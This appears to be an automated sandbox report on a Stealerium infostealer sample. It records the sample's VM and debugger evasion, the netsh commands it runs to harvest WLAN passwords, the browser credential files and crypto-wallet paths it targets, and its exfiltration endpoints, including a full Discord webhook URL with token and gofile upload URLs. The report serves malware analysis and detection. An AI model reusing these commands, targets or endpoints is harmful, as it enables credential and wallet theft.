Source: build (2).exe, 00000000.00000002.528316283.0000000002A8A000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.528336948.0000000002A92000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.528247787.0000000002A69000.00000004.00000800.00020000.00000000.sdmp, Info.txt.0.dr	Binary or memory string: VirtualMachine: False
Source: build (2).exe, 00000000.00000003.504079967.0000000000A23000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_VideoController(Standard display types)VMwareEUH_DVS9Win32_VideoController56527UE8VideoController120060621000000.000000-00010652887display.infMSBDAUO_18EH4PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78OKWin32_ComputerSystemcomputer1280 x 1024 x 4294967296 colors6GDUAHUX
Source: build (2).exe	Binary or memory string: VirtualMachine:
Source: build (2).exe, 00000000.00000002.531550791.0000000005233000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\user\Desktop\build (2).exe

Code function: 0_2_04B1076C CheckRemoteDebuggerPresent,

0_2_04B1076C

Source: C:\Users\user\Desktop\build (2).exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: build (2).exe, Stealerium/Modules/Keylogger/Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: build (2).exe, Stealerium/Target/Browsers/Firefox/WinApi.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 0.2.build (2).exe.130000.0.unpack, Stealerium/Modules/Keylogger/Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')
Source: 0.2.build (2).exe.130000.0.unpack, Stealerium/Target/Browsers/Firefox/WinApi.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 0.0.build (2).exe.130000.0.unpack, Stealerium/Target/Browsers/Firefox/WinApi.cs	Reference to suspicious API methods: ('GetProcAddress', 'GetProcAddress@kernel32.dll'), ('LoadLibrary', 'LoadLibrary@kernel32.dll')
Source: 0.0.build (2).exe.130000.0.unpack, Stealerium/Modules/Keylogger/Keylogger.cs	Reference to suspicious API methods: ('MapVirtualKey', 'MapVirtualKey@user32.dll')

Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid	Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe	Queries volume information: C:\Users\user\Desktop\build (2).exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId

Jump to behavior

Source: C:\Users\user\Desktop\build (2).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile

Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\build (2).exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Source: build (2).exe, 00000000.00000003.394995710.0000000005237000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.532301936.000000000546B000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.395250216.000000000523B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Stealing of Sensitive Information

Yara detected Stealerium

Source: Yara match	File source: build (2).exe, type: SAMPLE
Source: Yara match	File source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
Source: C:\Users\user\Desktop\build (2).exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile \| findstr All	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: build (2).exe	String found in binary or memory: Electrum
Source: build (2).exe	String found in binary or memory: \com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb
Source: build (2).exe	String found in binary or memory: \Exodus\exodus.wallet
Source: build (2).exe	String found in binary or memory: \Ethereum\keystore
Source: build (2).exe	String found in binary or memory: Exodus
Source: build (2).exe	String found in binary or memory: Ethereum
Source: build (2).exe	String found in binary or memory: \Ethereum\keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\build (2).exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Source: Yara match	File source: build (2).exe, type: SAMPLE
Source: Yara match	File source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build (2).exe PID: 3704, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealerium

Source: Yara match	File source: build (2).exe, type: SAMPLE
Source: Yara match	File source: 0.0.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.build (2).exe.130000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.248361009.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.521233810.0000000000132000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	1 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 Data Encrypted for Impact
Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	143 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	2 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	2 Obfuscated Files or Information	Security Account Manager	1 Query Registry	SMB/Windows Admin Shares	1 Input Capture	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	2 Software Packing	NTDS	351 Security Software Discovery	Distributed Component Object Model	1 Clipboard Data	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	23 Virtualization/Sandbox Evasion	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 DLL Side-Loading	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Masquerading	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	23 Virtualization/Sandbox Evasion	Proc Filesystem	1 System Network Configuration Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	11 Process Injection	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
build (2).exe	61%	Virustotal		Browse
build (2).exe	62%	ReversingLabs	ByteCode-MSIL.Infostealer.Stealgen
build (2).exe	100%	Avira	TR/Dropper.Gen
build (2).exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
0.2.build (2).exe.130000.0.unpack	100%	Avira	HEUR/AGEN.1203048		Download File
0.0.build (2).exe.130000.0.unpack	100%	Avira	HEUR/AGEN.1203048		Download File

Domains

Source	Detection	Scanner	Label	Link
canary.discord.com	0%	Virustotal		Browse
220.240.8.0.in-addr.arpa	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://canary.discord.com/api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wllkm5eEvJRRHZgq09CglFP4ccIwK3	0%	Avira URL Cloud	safe
http://icanhazip.com4	0%	Avira URL Cloud	safe
http://canary.discord.com	0%	Avira URL Cloud	safe
http://ip-api.com4	0%	URL Reputation	safe
https://store2.gofile.io4	0%	Avira URL Cloud	safe
https://canary.discord.com4	0%	Avira URL Cloud	safe
https://canary.discord.com	0%	Avira URL Cloud	safe
https://api.mylnikov.org4	0%	Avira URL Cloud	safe
https://canary.discord.com/api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wll	0%	Avira URL Cloud	safe
http://james.newtonking.com/projects/json	0%	URL Reputation	safe
https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn	0%	Avira URL Cloud	safe
https://java.sun.com	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
gofile.io	151.80.29.83	true	false		high
ip-api.com	208.95.112.1	true	false		high
canary.discord.com	162.159.136.232	true	false	0%, Virustotal, Browse	unknown
api.mylnikov.org	104.21.9.139	true	false		high
store2.gofile.io	31.14.70.243	true	false		high
icanhazip.com	104.18.115.97	true	false		high
apiv2.gofile.io	unknown	unknown	false		high
220.240.8.0.in-addr.arpa	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://canary.discord.com/api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wllkm5eEvJRRHZgq09CglFP4ccIwK3	false	Avira URL Cloud: safe	unknown
https://apiv2.gofile.io/getServer	false		high
http://icanhazip.com/	false		high
http://ip-api.com/line/?fields=hosting	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://store2.gofile.io	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high
https://duckduckgo.com/ac/?q=	tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high
https://github.com/dotnet/runtime8	build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
http://icanhazip.com4	build (2).exe, 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gofile.io/d/rGINJH)	build (2).exe, 00000000.00000002.526618705.0000000002820000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.newtonsoft.com/json	build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	false		high
http://canary.discord.com	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/dotnet/runtime	build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ip-api.com4	build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:0c:29:82:cb:33	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/dotnet-warnings/	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store2.gofile.io4	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apiv2.gofile.io	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/binaryformatter	build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
http://icanhazip.com	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525996890.00000000025F7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store2.gofile.io/	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	false		high
https://canary.discord.com4	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/JamesNK/Newtonsoft.Json	build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://canary.discord.com	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	build (2).exe, 00000000.00000003.494909273.0000000005217000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.470455035.0000000005216000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.496284393.000000000521F000.00000004.00000800.00020000.00000000.sdmp, tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high
http://store2.gofile.io	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org4	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/kgnfth	build (2).exe	false		high
https://github.com/mono/linker/issues/1416.	build (2).exe, 00000000.00000002.530240427.000000000370D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.533882153.00000000062A0000.00000004.00000001.00040000.00000000.sdmp, build (2).exe, 00000000.00000002.529858650.000000000361D000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	build (2).exe, 00000000.00000003.494909273.0000000005217000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.470455035.0000000005216000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.496284393.000000000521F000.00000004.00000800.00020000.00000000.sdmp, tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high
https://canary.discord.com/api/webhooks/988697412963016724/CAsg4XwfA4jFKgysuPonwOGeXucLs801yCDVr8Wll	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525847639.00000000025CA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://james.newtonking.com/projects/json	build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high
https://api.mylnikov.org/geolocation/wifi?v=1.1&	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://user-images.githubusercontent.com/45857590/138568746-1a5578fe-f51b-4114-bcf2-e374535f8488.pn	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000002.525788978.0000000002591000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://gofile.io/d/rGINJH	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
https://java.sun.com	build (2).exe, 00000000.00000003.395329735.000000000532B000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.394587117.000000000530A000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.newtonsoft.com/jsonschema	build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.codeplex.com/DotNetZip	build (2).exe, 00000000.00000002.530316264.0000000003799000.00000004.00000800.00020000.00000000.sdmp	false		high
https://store2.gofile.io/uploadFile	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.nuget.org/packages/Newtonsoft.Json.Bson	build (2).exe, 00000000.00000002.533732899.00000000060F0000.00000004.08000000.00040000.00000000.sdmp, build (2).exe, 00000000.00000003.515258530.0000000003925000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.515476087.0000000003A65000.00000004.00000800.00020000.00000000.sdmp	false		high
https://gofile.io/d/rGINJH8	build (2).exe, 00000000.00000002.526100333.0000000002695000.00000004.00000800.00020000.00000000.sdmp	false		high
http://api.mylnikov.org	build (2).exe, 00000000.00000002.526454869.0000000002745000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	build (2).exe, 00000000.00000003.494909273.0000000005217000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.470455035.0000000005216000.00000004.00000800.00020000.00000000.sdmp, build (2).exe, 00000000.00000003.496284393.000000000521F000.00000004.00000800.00020000.00000000.sdmp, tmpCF58.tmp.dat.0.dr, tmpF861.tmp.dat.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
162.159.136.232	canary.discord.com	United States	13335	CLOUDFLARENETUS	false
151.80.29.83	gofile.io	Italy	16276	OVHFR	false
104.18.115.97	icanhazip.com	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	35.0.0 Citrine
Analysis ID:	649602
Start date and time: 21/06/202214:47:56	2022-06-21 14:47:56 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	build (2).bin (renamed file extension from bin to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	32
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@18/73@11/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 0.6% (good quality ratio 0.3%) Quality average: 29.3% Quality standard deviation: 35.9%
HCA Information:	Successful, ratio: 100% Number of executed functions: 84 Number of non-executed functions: 7
Cookbook Comments:	Adjust boot time Enable AMSI

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
208.95.112.1	SpammerDS_V1.3.exe	Get hash	malicious	Browse	ip-api.com/json/
	Client-builts.exe	Get hash	malicious	Browse	ip-api.com/json/
	OliwciaPrivInstaller.exe	Get hash	malicious	Browse	ip-api.com/json/
	HackLoader.exe	Get hash	malicious	Browse	ip-api.com/line/?fields=hosting
	Corrected documents.js	Get hash	malicious	Browse	ip-api.com/json/
	R8B8ktGtaP.exe	Get hash	malicious	Browse	ip-api.com/json/
	Install.exe	Get hash	malicious	Browse	ip-api.com/line/?fields=hosting
	SifreliDosya.exe	Get hash	malicious	Browse	ip-api.com/line/?fields=hosting
	MAGICD_1.exe.exe	Get hash	malicious	Browse	ip-api.com/json/
	O7G7uJC0QQ.exe	Get hash	malicious	Browse	ip-api.com/json/
	O7G7uJC0QQ.exe	Get hash	malicious	Browse	ip-api.com/json/
	DontPanic_1_2_3.exe	Get hash	malicious	Browse	ip-api.com/line/?fields=hosting
	Scarlet Fire.mp3.exe.exe	Get hash	malicious	Browse	ip-api.com//json/84.17.52.13
	q6lhRm7ga9.exe	Get hash	malicious	Browse	ip-api.com/json
	A7JNp8nnof.exe	Get hash	malicious	Browse	ip-api.com/json
	Lecture4.exe	Get hash	malicious	Browse	ip-api.com/line/?fields=hosting
	92qI4u3y7j.exe	Get hash	malicious	Browse	ip-api.com/json
	OieC6ysAgC.exe	Get hash	malicious	Browse	ip-api.com/json
	OieC6ysAgC.exe	Get hash	malicious	Browse	ip-api.com/json
	SecuriteInfo.com.Trojan.PWS.StealerNET.102.1460.exe	Get hash	malicious	Browse	ip-api.com/line/?fields=hosting

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gofile.io	Lsp1YzfFRW.exe	Get hash	malicious	Browse	31.14.70.242
